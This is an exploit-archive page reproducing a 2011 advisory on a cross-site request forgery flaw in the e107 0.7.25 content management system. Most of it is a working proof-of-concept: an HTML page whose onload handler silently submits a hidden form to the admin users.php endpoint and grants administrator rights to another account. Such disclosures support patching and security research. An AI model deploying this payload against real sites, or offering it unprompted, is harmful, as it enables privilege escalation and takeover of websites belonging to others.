Advertisement






e107 0.7.25 Cross Site Request Forgery

CVE Category Price Severity
CVE-2008-5234 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2011-04-12
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2011040044

Below is a copy:

<!------------------------------------------------------------------------
# Software................e107 0.7.25
# Vulnerability...........Cross-site Request Forgery
# Threat Level............Low (1/5)
# Download................http://e107.org/edownload.php
# Discovery Date..........4/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <[email protected]>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A cross-site request forgery vulnerability in e107 can be exploited to
# grant admin privileges.
# 
# 
# --PoC-->

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/e107/e107_admin/users.php">
            <input type="hidden" name="e-token" value="" />
            <input type="hidden" name="userid" value="2" />
            <input type="hidden" name="userip" value="" />
            <input type="hidden" name="useraction" value="admin" />
        </form>
    </body>
</html>


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum